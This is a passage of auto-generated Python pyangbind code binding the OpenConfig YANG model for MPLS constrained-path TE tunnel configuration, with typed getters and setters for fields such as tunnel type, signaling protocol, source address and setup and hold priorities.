"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
def _get_soft_preemption(self):
"""
Getter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
YANG Description: Enables RSVP soft-preemption on this LSP
"""
return self.__soft_preemption
def _set_soft_preemption(self, v, load=False):
"""
Setter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_soft_preemption is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_soft_preemption() directly.
YANG Description: Enables RSVP soft-preemption on this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """soft_preemption must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__soft_preemption = t
if hasattr(self, "_set"):
self._set()
def _unset_soft_preemption(self):
self.__soft_preemption = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_setup_priority(self):
"""
Getter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
return self.__setup_priority
def _set_setup_priority(self, v, load=False):
"""
Setter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_setup_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_setup_priority() directly.
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """setup_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(7), is_leaf=True, yang_name="setup-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__setup_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_setup_priority(self):
self.__setup_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_hold_priority(self):
"""
Getter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
return self.__hold_priority
def _set_hold_priority(self, v, load=False):
"""
Setter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_hold_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hold_priority() directly.
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """hold_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(0), is_leaf=True, yang_name="hold-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__hold_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_hold_priority(self):
self.__hold_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
name = __builtin__.property(_get_name, _set_name)
type = __builtin__.property(_get_type, _set_type)
signaling_protocol = __builtin__.property(
_get_signaling_protocol, _set_signaling_protocol
)
description = __builtin__.property(_get_description, _set_description)
admin_status = __builtin__.property(_get_admin_status, _set_admin_status)
preference = __builtin__.property(_get_preference, _set_preference)
metric_type = __builtin__.property(_get_metric_type, _set_metric_type)
metric = __builtin__.property(_get_metric, _set_metric)
shortcut_eligible = __builtin__.property(
_get_shortcut_eligible, _set_shortcut_eligible
)
protection_style_requested = __builtin__.property(
_get_protection_style_requested, _set_protection_style_requested
)
reoptimize_timer = __builtin__.property(
_get_reoptimize_timer, _set_reoptimize_timer
)
source = __builtin__.property(_get_source, _set_source)
soft_preemption = __builtin__.property(_get_soft_preemption, _set_soft_preemption)
setup_priority = __builtin__.property(_get_setup_priority, _set_setup_priority)
hold_priority = __builtin__.property(_get_hold_priority, _set_hold_priority)
_pyangbind_elements = OrderedDict(
[
("name", name),
("type", type),
("signaling_protocol", signaling_protocol),
("description", description),
("admin_status", admin_status),
("preference", preference),
("metric_type", metric_type),
("metric", metric),
("shortcut_eligible", shortcut_eligible),
("protection_style_requested", protection_style_requested),
("reoptimize_timer", reoptimize_timer),
("source", source),
("soft_preemption", soft_preemption),
("setup_priority", setup_priority),
("hold_priority", hold_priority),
]
)
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/mpls/lsps/constrained-path/tunnels/tunnel/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters related to TE tunnels:
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__name",
"__type",
"__signaling_protocol",
"__description",
"__admin_status",
"__preference",
"__metric_type",
"__metric",
"__shortcut_eligible",
"__protection_style_requested",
"__reoptimize_timer",
"__source",
"__soft_preemption",
"__setup_priority",
"__hold_priority",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__name = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
self.__type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__signaling_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__description = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
self.__admin_status = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__preference = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
self.__shortcut_eligible = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__protection_style_requested = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__reoptimize_timer = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
self.__source = YANGDynClass(
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
self.__soft_preemption = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__setup_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
self.__hold_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"mpls",
"lsps",
"constrained-path",
"tunnels",
"tunnel",
"config",
]
def _get_name(self):
"""
Getter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)
YANG Description: The tunnel name
"""
return self.__name
def _set_name(self, v, load=False):
"""
Setter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_name() directly.
YANG Description: The tunnel name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """name must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
}
)
self.__name = t
if hasattr(self, "_set"):
self._set()
def _unset_name(self):
self.__name = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
def _get_type(self):
"""
Getter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)
YANG Description: Tunnel type, p2p or p2mp
"""
return self.__type
def _set_type(self, v, load=False):
"""
Setter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_type() directly.
YANG Description: Tunnel type, p2p or p2mp
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """type must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__type = t
if hasattr(self, "_set"):
self._set()
def _unset_type(self):
self.__type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
